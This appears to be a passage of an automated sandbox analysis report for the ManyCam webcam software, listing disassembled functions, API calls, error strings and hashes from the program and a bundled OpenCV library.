Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Create$Image
String ID:
API String ID: 1237808576-0
Opcode ID: ae6bf935b923b4879af12b20d1e7ba834aac778abf3f025c7bd5bd2a014dc142
Instruction ID: 61334a59a6328505146fa154266dd27d5a2e39e93b606410563eabcbac9550f4
Opcode Fuzzy Hash: ae6bf935b923b4879af12b20d1e7ba834aac778abf3f025c7bd5bd2a014dc142
Instruction Fuzzy Hash: 225106B0A81B027AF67057719E0BB9326912B26B01F050539BB4DB83C6FBF59521CA99

Function 004B8960 Relevance: 30.1, APIs: 7, Strings: 10, Instructions: 397COMMON

Download Yara Rule

Strings

Desired frame size is invalid., xrefs: 004B8A49
Such camera is already in the list: %s, xrefs: 004B8AC7
Failed to create the graph with hr=%X, xrefs: 004B8C85
Destroy the graph for camera %s, xrefs: 004B8B94
CManyCamGraphMgr::AddCameraInput, xrefs: 004B8995
Creating the graph for camera %s, xrefs: 004B8C3E
Graph creation failed with hr=%X, xrefs: 004B8E3F
Creating new entry for camera %s, xrefs: 004B8D86
Moniker is NULL., xrefs: 004B89FF
Error: camera name is empty., xrefs: 004B89BB

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: clock$AllocatorDebugHeapfflushfwprintf
String ID: CManyCamGraphMgr::AddCameraInput$Creating new entry for camera %s$Creating the graph for camera %s$Desired frame size is invalid.$Destroy the graph for camera %s$Error: camera name is empty.$Failed to create the graph with hr=%X$Graph creation failed with hr=%X$Moniker is NULL.$Such camera is already in the list: %s
API String ID: 2739697835-1067953073
Opcode ID: 8320536623643fb9a82ccd93883c4b51503a044c0bfe6443a3796fe1dcf3ba29
Instruction ID: 0c2db78db8441f90a5655b608386306daf3177cd87543fca05d57ae7838a8fe2
Opcode Fuzzy Hash: 8320536623643fb9a82ccd93883c4b51503a044c0bfe6443a3796fe1dcf3ba29
Instruction Fuzzy Hash: F5024C70900208EFDB14EF95CC92BEEBBB5BF54304F10415EE5066B2D2DB786A45CBA9

Function 00402EC0 Relevance: 30.1, APIs: 20, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012A4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032CA
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012A8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032DC
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012AC,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 004032EA
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C0,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403302
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C4,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403314
Part of subcall function 004032A0: cvReleaseImage.CXCORE099(004012C8,00000100,004012A0,00000000,00402ECD,00000000,?,00401305,?,?,004012A0,?), ref: 00403326

cvReleaseMat.CXCORE099(00000118,?), ref: 00402ED9
cvReleaseMat.CXCORE099(00000114), ref: 00402EEB
cvReleaseMat.CXCORE099(0000011C), ref: 00402EFD
cvReleaseMat.CXCORE099(00000120), ref: 00402F0F
cvReleaseMat.CXCORE099(00000124), ref: 00402F21
cvReleaseMat.CXCORE099(00000128), ref: 00402F33
cvReleaseMat.CXCORE099(0000012C), ref: 00402F45
cvReleaseMat.CXCORE099(00000130), ref: 00402F57
cvReleaseMat.CXCORE099(00000134), ref: 00402F69
cvReleaseMat.CXCORE099(00000100), ref: 00402F77
cvReleaseMat.CXCORE099(00000104), ref: 00402F89
cvReleaseMat.CXCORE099(00000110), ref: 00402F9B
cvReleaseMat.CXCORE099(00000108), ref: 00402FAD
cvReleaseMat.CXCORE099(0000010C), ref: 00402FBF
cvReleaseMat.CXCORE099(00000138), ref: 00402FD1
cvReleaseMat.CXCORE099(0000013C), ref: 00402FE3
cvReleaseMat.CXCORE099(00000140), ref: 00402FF5
cvReleaseMat.CXCORE099(00000144), ref: 00403007
cvReleaseMat.CXCORE099(00000148), ref: 00403019
cvReleaseMat.CXCORE099(0000014C), ref: 0040302C

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Release$Image
String ID:
API String ID: 1442443227-0
Opcode ID: 18739cc84c4e819f13137b706e7aec6c30c3c301381e9e13cdbf496b20ef20f3
Instruction ID: e9e9c9bdbcc23bd9ce4fc92c64f6ef92138ef717c9158f18fb2c09d524048864
Opcode Fuzzy Hash: 18739cc84c4e819f13137b706e7aec6c30c3c301381e9e13cdbf496b20ef20f3
Instruction Fuzzy Hash: 3A415AB1C01B11ABDA70DB60D94EB97B6EC7F01300F44493E914B929D0EB79F658CAA3

Function 004AF1A0 Relevance: 30.0, APIs: 2, Strings: 15, Instructions: 270comCOMMON

Download Yara Rule

APIs

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

CoCreateInstance.OLE32(0056F320,00000000,00000001,00571B10,00000000,?,00000000,?,?,744843B1), ref: 004AF229

Part of subcall function 004B76D0: fwprintf.MSVCR80 ref: 004B7764
Part of subcall function 004B76D0: fflush.MSVCR80 ref: 004B7774

CoCreateInstance.OLE32(0056F2E0,00000000,00000001,00571B40,00000000,00000000,00000000,?,?,744843B1), ref: 004AF297

Strings

Init cap graph builder., xrefs: 004AF2C1
Failed with hr = %X., xrefs: 004AF37E
Getting IMediaEventEx interface., xrefs: 004AF41F
Getting IMediaSeeking Interface., xrefs: 004AF3A9
Failed with hr = %X., xrefs: 004AF4DD
Creating cature graph builder., xrefs: 004AF26B
Getting IMediaControlInterface., xrefs: 004AF333
Failed with hr = %X., xrefs: 004AF308
Failed with hr = %X., xrefs: 004AF46A
Failed with hr = %X., xrefs: 004AF3F4
Failed with hr = %X., xrefs: 004AF23C
Getting IMediaFilter interface., xrefs: 004AF492
CGraphMgr::InitInternalInterfaces, xrefs: 004AF1C8
Failed with hr = %X., xrefs: 004AF2AA
Creating an instance of IGraphBuilder., xrefs: 004AF1FD

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: CreateInstance$AllocatorDebugHeapclockfflushfwprintf
String ID: CGraphMgr::InitInternalInterfaces$Creating an instance of IGraphBuilder.$Creating cature graph builder.$Failed with hr = %X.$Failed with hr = %X.$Failed with hr = %X.$Failed with hr = %X.$Failed with hr = %X.$Failed with hr = %X.$Failed with hr = %X.$Getting IMediaControlInterface.$Getting IMediaEventEx interface.$Getting IMediaFilter interface.$Getting IMediaSeeking Interface.$Init cap graph builder.
API String ID: 3340919952-3253057602
Opcode ID: 9b086fe0cb3031e3bc22e440be552398c93d060f0653d1dd36aa5157d34c403a
Instruction ID: 91a63dad0f67e3e0232ba0b1807ee47d54ee56e4fdf06e0acade68bce617adf4
Opcode Fuzzy Hash: 9b086fe0cb3031e3bc22e440be552398c93d060f0653d1dd36aa5157d34c403a
Instruction Fuzzy Hash: 10A18270E402099BDB04EBD9DC62BBE77B0BF99719F10402EF80677282DB796905C769

Function 00C029F0 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 383COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,00000000,00000000), ref: 00C02A31
cvGetErrStatus.GLU32 ref: 00C02A3B
cvError.GLU32(000000FF,cvCrossProduct,Inner function failed.,.\cxmatrix.cpp,0000058D), ref: 00C02A5A
cvError.GLU32(000000FB,cvCrossProduct,All the input arrays must be continuous 3-vectors,.\cxmatrix.cpp,0000057F), ref: 00C02AA2
cvGetMat.GLU32(?,?,00000000,00000000), ref: 00C02B28
cvGetErrStatus.GLU32 ref: 00C02B36
cvGetMat.GLU32(00000000,?,00000000,00000000), ref: 00C02B6C
cvGetErrStatus.GLU32 ref: 00C02B7A
cvError.GLU32(FFFFFF33,cvCrossProduct,00C4124F,.\cxmatrix.cpp,00000594), ref: 00C02BC4
cvError.GLU32(FFFFFF2E,cvCrossProduct,00C4124F,.\cxmatrix.cpp,000005CA), ref: 00C02DDD
cvError.GLU32(000000E5,cvCrossProduct,00C4124F,.\cxmatrix.cpp,00000582), ref: 00C02E2A

Strings

All the input arrays must be continuous 3-vectors, xrefs: 00C02A96
.\cxmatrix.cpp, xrefs: 00C02A49, 00C02A91, 00C02BB0, 00C02DC9, 00C02DF1, 00C02E19
Inner function failed., xrefs: 00C02A4E
cvCrossProduct, xrefs: 00C02A53, 00C02A9B, 00C02BBA, 00C02DD3, 00C02DFB, 00C02E23

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status
String ID: .\cxmatrix.cpp$All the input arrays must be continuous 3-vectors$Inner function failed.$cvCrossProduct
API String ID: 483703942-2733618178
Opcode ID: 786dae91c0ef368c61eb58b63c3efd9388a0a8791b79e7868aeae0625ff2608a
Instruction ID: 603c6b22c5eee8cd02924794a99d353b0275b34a4be8bb606f8277a57035aad9
Opcode Fuzzy Hash: 786dae91c0ef368c61eb58b63c3efd9388a0a8791b79e7868aeae0625ff2608a
Instruction Fuzzy Hash: 4ED12832B00701DBC720DF14E885B25B3A1FF94711F2606AAE56AAB2E1D771DD65CBC1

Function 004A8E90 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 328memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

_DebugHeapAllocator.LIBCPMTD ref: 004A8F0A

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

Part of subcall function 004164A0: FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5

wcscmp.MSVCR80 ref: 004A8F3A
wcscmp.MSVCR80 ref: 004A8F53
wcscmp.MSVCR80 ref: 004A8F80
_DebugHeapAllocator.LIBCPMTD ref: 004A92EC
_DebugHeapAllocator.LIBCPMTD ref: 004A9304
_DebugHeapAllocator.LIBCPMTD ref: 004A9324

Strings

InternalProperties, xrefs: 004A8F7B

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$wcscmp$FileFindFirst
String ID: InternalProperties
API String ID: 1222566788-1350816593
Opcode ID: c6da74deea4d9cd51fd66fbdb8e43503fd6c04aced2bb07cda00fcb46decaaae
Instruction ID: d461dac8b76a5e630202117bde1037354cd356562fc5738dbdf76f67a61ac83d
Opcode Fuzzy Hash: c6da74deea4d9cd51fd66fbdb8e43503fd6c04aced2bb07cda00fcb46decaaae
Instruction Fuzzy Hash: 30F13AB49001199FDB14DF54CC94BAEB7B5BF55304F1085DAEA0AA7381DB34AE88CF68

Function 00BF62A0 Relevance: 28.3, APIs: 11, Strings: 5, Instructions: 275COMMON

Download Yara Rule

APIs

cvGetMat.GLU32(?,?,?,00000000), ref: 00BF633F
cvGetErrStatus.GLU32 ref: 00BF6349
cvError.GLU32(000000FF,cvDotProduct,Inner function failed.,.\cxmatmul.cpp,00000CEE), ref: 00BF6368
cvError.GLU32(000000E8,cvDotProduct,coi is not supported,.\cxmatmul.cpp,00000CF1), ref: 00BF6398

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

Strings

.\cxmatmul.cpp, xrefs: 00BF6357, 00BF6387, 00BF6421, 00BF6528, 00BF6571, 00BF65BC
OpenCV function failed, xrefs: 00BF6576
Inner function failed., xrefs: 00BF635C
coi is not supported, xrefs: 00BF638C
cvDotProduct, xrefs: 00BF6361, 00BF6391, 00BF642B, 00BF6532, 00BF657B, 00BF65C6

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: ErrorStatus
String ID: .\cxmatmul.cpp$Inner function failed.$OpenCV function failed$coi is not supported$cvDotProduct
API String ID: 1596131371-878145941
Opcode ID: 75dfc7f70da2649cc0876124a0a18fc6a79ffe8216890745f5615a6726b86dc0
Instruction ID: b4befc31d9cfa34f3f36d80466aa1934aad53eef6d59b9bff445d651414d3325
Opcode Fuzzy Hash: 75dfc7f70da2649cc0876124a0a18fc6a79ffe8216890745f5615a6726b86dc0
Instruction Fuzzy Hash: 129112727043099BD724DF5CE891A3AB3E5FB98714F000AEEFA4997284E771E8588791

Function 00C240D0 Relevance: 28.3, APIs: 9, Strings: 7, Instructions: 260COMMON

Download Yara Rule

APIs

cvError.GLU32(000000FB,icvXMLWriteTag,An attempt to add element without a key to a map, or add element with key to sequence,.\cxpersistence.cpp,000008AE,00000000,?,00000000,-00000001,00C2B0FB,00000000,00000000), ref: 00C24133
cvError.GLU32(000000FB,icvXMLWriteTag,Closing tag should not include any attributes,.\cxpersistence.cpp,000008C4), ref: 00C241AE
cvError.GLU32(000000FB,icvXMLWriteTag,A single _ is a reserved tag name,.\cxpersistence.cpp,000008BD,00000000,?,00000000,-00000001,00C2B0FB,00000000,00000000), ref: 00C241DF
isalpha.MSVCR80 ref: 00C241FA
cvError.GLU32(000000FB,icvXMLWriteTag,Key should start with a letter or _,.\cxpersistence.cpp,000008C9,-00000001,00C2B0FB,00000000,00000000), ref: 00C24222

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

isalnum.MSVCR80 ref: 00C2426B
memcpy.MSVCR80(?,00000003,-00000001), ref: 00C2430E
memcpy.MSVCR80(?,00000000,-00000001,?,00000003,-00000001), ref: 00C24329

Strings

Closing tag should not include any attributes, xrefs: 00C241A2
Invalid character in the key, xrefs: 00C2436B
An attempt to add element without a key to a map, or add element with key to sequence, xrefs: 00C24127
Key should start with a letter or _, xrefs: 00C24216
A single _ is a reserved tag name, xrefs: 00C241D3
.\cxpersistence.cpp, xrefs: 00C24122, 00C2419D, 00C241CE, 00C24211, 00C24366
icvXMLWriteTag, xrefs: 00C2412C, 00C241A7, 00C241D8, 00C2421B, 00C24370

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$memcpy$Statusisalnumisalpha
String ID: .\cxpersistence.cpp$A single _ is a reserved tag name$An attempt to add element without a key to a map, or add element with key to sequence$Closing tag should not include any attributes$Invalid character in the key$Key should start with a letter or _$icvXMLWriteTag
API String ID: 687291174-4149322074
Opcode ID: 66acfb162689377bc45e4fac6a608223bbcbf262d00734cfcebba68b7cb4a0b5
Instruction ID: 4088e48c14194ab1dada321de075da93d5a2c364efe56a812b98db32355319fa
Opcode Fuzzy Hash: 66acfb162689377bc45e4fac6a608223bbcbf262d00734cfcebba68b7cb4a0b5
Instruction Fuzzy Hash: 05817A72A443566FC710CE28FC81B5AB7D0AB54314F084679FC549B782E775EB88C792

Function 004010A0 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 187COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000FB,cvCylCreateTrackerContext,Invalid frame size.,.\src\cyltracker.cpp,00000064), ref: 004012DF

Strings

Invalid method., xrefs: 004010EC
.\src\cyltracker.cpp, xrefs: 004010E7, 00401108, 00401125, 00401272, 004012A8, 004012CE
Insufficient memory for initializing tracker, xrefs: 004012AD
Insufficient memory., xrefs: 00401277
Invalid model type., xrefs: 0040110D
cvCylCreateTrackerContext, xrefs: 0040127C, 004012B2, 004012D8
Invalid pyramid type., xrefs: 0040112A
Invalid frame size., xrefs: 004012D3

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724847690.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1725884112.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726024536.0000000000595000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726049169.000000000059B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726083357.000000000059C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1726113327.00000000005A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\src\cyltracker.cpp$Insufficient memory for initializing tracker$Insufficient memory.$Invalid frame size.$Invalid method.$Invalid model type.$Invalid pyramid type.$cvCylCreateTrackerContext
API String ID: 2619118453-4185331338
Opcode ID: 159e2c39b6469685c728ac88f41f5128306c1347d163a9cc52779d86d74ae199
Instruction ID: 99194e5ea39f0bab6f8ac41c15566c549df518491d95b6df1d49c7cd51309a21
Opcode Fuzzy Hash: 159e2c39b6469685c728ac88f41f5128306c1347d163a9cc52779d86d74ae199
Instruction Fuzzy Hash: 6F51F5B6B4031157DB149E58AC82BA67790BB85710F0881BEFE0CBF3D2E6759904C7A6

Function 00BCE120 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 158COMMON

Download Yara Rule

APIs

cvGetMat.GLU32 ref: 00BCE13D

Part of subcall function 00B9E130: cvError.GLU32(000000E5,cvGetMat,NULL array pointer is passed,.\cxarray.cpp,00000ADB,?,?,?,?), ref: 00B9E4BC

cvGetErrStatus.GLU32 ref: 00BCE147

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(000000FF,cvEllipse,Inner function failed.,.\cxdrawing.cpp,00000753), ref: 00BCE166

Part of subcall function 00BD6DF0: cvSetErrStatus.GLU32(00000000,00000000,?,00B9107F,000000FC,cvAlloc,Out of memory,.\cxalloc.cpp,0000006F), ref: 00BD6DFD

cvError.GLU32(000000E8,cvEllipse,Unsupported format,.\cxdrawing.cpp,00000759), ref: 00BCE1AB

Strings

shift must be between 0 and 16, xrefs: 00BCE2BE
cvEllipse, xrefs: 00BCE15F, 00BCE1A4, 00BCE29D, 00BCE2C3, 00BCE2EC, 00BCE314
.\cxdrawing.cpp, xrefs: 00BCE155, 00BCE19A, 00BCE293, 00BCE2B9, 00BCE2E2, 00BCE30A
Inner function failed., xrefs: 00BCE15A, 00BCE298
Unsupported format, xrefs: 00BCE19F

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$malloc
String ID: .\cxdrawing.cpp$Inner function failed.$Unsupported format$cvEllipse$shift must be between 0 and 16
API String ID: 1345421445-436934637
Opcode ID: c41071572fc728bf222bce5de0880c0d297df281a2b52245dbceb5f86228eda0
Instruction ID: c506d30eba122d6994e9ee8c25eafe9efe61721b16b54846d7ea5843f33f248d
Opcode Fuzzy Hash: c41071572fc728bf222bce5de0880c0d297df281a2b52245dbceb5f86228eda0
Instruction Fuzzy Hash: 49412AB6B4C300ABD6146A48DC42F9B73D5FBC4B50F44057DFA58A63D2E2B1E5048763

Function 00C2C180 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 156COMMON

Download Yara Rule

APIs

cvGetFileNodeByName.GLU32(?,?,sequences), ref: 00C2C199

Part of subcall function 00C22FC0: cvError.GLU32(000000E5,cvGetFileNodeByName,Null element name,.\cxpersistence.cpp,0000023E), ref: 00C2300D

cvStartReadSeq.GLU32(?,?,00000000), ref: 00C2C1D7
cvRead.GLU32(?,?,00000000), ref: 00C2C1FA

Part of subcall function 00C279F0: cvGetErrStatus.GLU32(?,?,?,?,?,?,00000000), ref: 00C27A23
Part of subcall function 00C279F0: cvError.GLU32(?,cvRead,Invalid pointer to file storage,.\cxpersistence.cpp,00001398,?,00C2CD2D,00000000,?,00000000), ref: 00C27A7B

cvGetErrStatus.GLU32 ref: 00C2C204

Part of subcall function 00BD6D60: malloc.MSVCR80 ref: 00BD6D6E

cvError.GLU32(000000FF,icvReadSeqTree,Inner function failed.,.\cxpersistence.cpp,00001119), ref: 00C2C2EB

Part of subcall function 00C23A30: cvGetFileNodeByName.GLU32(?,?,?), ref: 00C23A42

cvGetErrStatus.GLU32 ref: 00C2C228
cvChangeSeqBlock.GLU32(?,00000001), ref: 00C2C2A1
cvError.GLU32(FFFFFF2C,icvReadSeqTree,All the sequence tree nodes should contain "level" field,.\cxpersistence.cpp,0000111C), ref: 00C2C316
cvError.GLU32(FFFFFF2C,icvReadSeqTree,opencv-sequence-tree instance should contain a field "sequences" that should be a sequence,.\cxpersistence.cpp,0000110E), ref: 00C2C341

Strings

All the sequence tree nodes should contain "level" field, xrefs: 00C2C307
opencv-sequence-tree instance should contain a field "sequences" that should be a sequence, xrefs: 00C2C332
level, xrefs: 00C2C217
Inner function failed., xrefs: 00C2C2DF
sequences, xrefs: 00C2C18E
icvReadSeqTree, xrefs: 00C2C2E4, 00C2C30C, 00C2C337
.\cxpersistence.cpp, xrefs: 00C2C2DA, 00C2C302, 00C2C32D

Memory Dump Source

Source File: 00000002.00000002.1726338698.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000002.00000002.1726321884.0000000000B90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726405590.0000000000C41000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726432962.0000000000C64000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726451353.0000000000C72000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726465547.0000000000C74000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b90000_ManyCam.jbxd

Similarity

API ID: Error$Status$FileNameNodeRead$BlockChangeStartmalloc
String ID: .\cxpersistence.cpp$All the sequence tree nodes should contain "level" field$Inner function failed.$icvReadSeqTree$level$opencv-sequence-tree instance should contain a field "sequences" that should be a sequence$sequences
API String ID: 528128644-3956887381
Opcode ID: 1907230aae848ef2356c50d9e151a473c8ac304ffb1a01482f28af0621e43886
Instruction ID: fb2b50914fa55d4f9e860b603970970b3e6a6fe14bcf7e751b77c14ad851ce3d
Opcode Fuzzy Hash: 1907230aae848ef2356c50d9e151a473c8ac304ffb1a01482f28af0621e43886
Instruction Fuzzy Hash: B0411375B44310ABC610DE98ECC295FB7E4EB84720F440A3AFD55D7752D770E9488B92

Function 004735B0 Relevance: 26.6, APIs: 7, Strings: 8, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 00474150: _DebugHeapAllocator.LIBCPMTD ref: 00474184

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00473611

Part of subcall function 0040EDB0: _DebugHeapAllocator.LIBCPMTD ref: 0040EDE7

swscanf.MSVCR80 ref: 00473710
swscanf.MSVCR80 ref: 0047372B
swscanf.MSVCR80 ref: 00473746

Strings

Error parsing color field: one of color components is not specified, xrefs: 00473891
Error parsing color field: wrong number of symbols after '#', xrefs: 00473689
Error parsing color field: unexpected symbols '%s'., xrefs: 004739E1
Unspecified error., xrefs: 004735EB
rgb(, xrefs: 0047378C
Success., xrefs: 00473A16
Error parsing color field: one of color components is not specified, xrefs: 0047392B
Error parsing color field: one of color components is not specified, xrefs: 00473803

Memory Dump Source

Source File: 00000002.00000002.1724900442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

